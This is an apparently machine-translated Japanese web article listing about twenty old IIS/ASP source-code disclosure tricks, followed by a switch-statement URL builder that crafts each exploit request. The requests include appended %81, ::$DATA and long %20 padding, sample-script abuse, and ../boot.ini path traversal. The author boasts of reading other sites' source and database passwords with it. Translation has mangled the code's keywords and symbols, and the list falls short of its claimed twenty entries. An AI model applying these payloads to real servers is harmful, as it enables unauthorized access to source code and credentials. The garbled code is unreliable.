ASPプログラムソースコードを表示するための20の方法とツール

著者：Eve Cole 更新時間：2025-03-13 14:32:01

誰もが知っているように、Windowsプラットフォームには多くの抜け穴があり、パッチは次々にありますが、それを補うには常に十分ではありません。 ASPソースコードを調べることについて知っている20の方法を要約し、これらの脆弱性をスキャンするためのアプリケーションを書きました。しかし、過去2日間で、データベースパスワードを含む多くのウェブサイトのソースコードを実際に見ました。データベースに対して、あなたが望むことを何でもします。まず、これらの20の方法を以下にリストします。

。

％81

：：データ

％2e

％2e％41sp

+.htr

Longhtr

.bak

codebrws.asp

showcode.asp

null.htw

Qfallhit.htw

qsumrhit.htw

query.idq

Search/Qfallhit.htw

検索/qsumrhit.htw

iirturnh.htw

.htw

翻訳：f

上記の脆弱性の最初の10は、xxx.asp％81のようなASPファイルに直接追加されます：fメソッドは、各脆弱性を使用するために、TCP/IPのソケット接続を確立する必要があります私のサイトからすべてをダウンロードしてください。

switch（this.cbomethod.selectedindex）

{

ケース0：//直接読み取ります

strrequestfile = strserver + strurl;

壊す;

ケース5：//％2E％41SP

strrequestfile = strserver + strpath + strfirst

+％2e％41SP;

壊す;

ケース8：// longhtr

strrequestfile = strserver + strurl

+ +％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％

+ 20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％

+ 20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％.htr;

壊す;

ケース10：//codebrws.asp

strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source=

+ strurl;

壊す;

ケース11：//showcode.asp

strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source=

+/msadc/../../../boot.ini;

壊す;

ケース12：//null.htw

strrequestfile = strserver + /null.htw?ciwebhitsfile=

+ strurl +％20＆cirestriction = none＆cihiliteType = full;

壊す;

ケース13：//qfullhit.htw

strrequestfile = strserver +/iissamples/issamples/oop/qfullhit.htw？

+ ciwebhitsfile =/../../boot.ini＆cirestriction = none

+＆cihiliteType = full;

壊す;

ケース14：//qsumrhit.htw

strrequestfile = strserver + /iissamples/issamples/oop/qsumrhit.htw？

+ ciwebhitsfile =/../../boot.ini＆cirestriction = none

+＆cihiliteType = full;

壊す;

ケース15：//query.idq

strrequestfile = strserver +/query.idq?citemplate=/../..//boot.ini

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％

+ 20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％.htx;

壊す;

ケース16：//search/qfullhit.htw

strrequestfile = strserver + /iissamples/exair/search/qfullhit.htw？

+ ciwebhitsfile =/../../boot.ini＆cirestriction = none

+＆cihiliteType = full;

壊す;

ケース17：//検索/qsumrhit.htw

strrequestfile = strserver + /iissamples/exair/search/qsumrhit.htw？

+ ciwebhitsfile =/../../boot.ini＆cirestriction = none

+＆cihiliteType = full;

壊す;

ケース18：//iirturnh.htw

strrequestfile = strserver + /iishelp/iis/misc/iirturnh.htw？

+ ciwebhitsfile =/../../boot.ini＆cirestriction = none

+＆cihiliteType = full;

壊す;

ケース19：//.htw

strrequestfile = strserver + strurl

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％

+ 20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20％20

+％20％20％20％20％20％20％20％20％20％20％.htw？

+ ciwebhitsfile =/../../boot.ini＆cirestriction = none

+＆cihiliteType = full;

壊す;

デフォルト：

strrequestfile = strserver + strurl + this.cbomethod.text;

}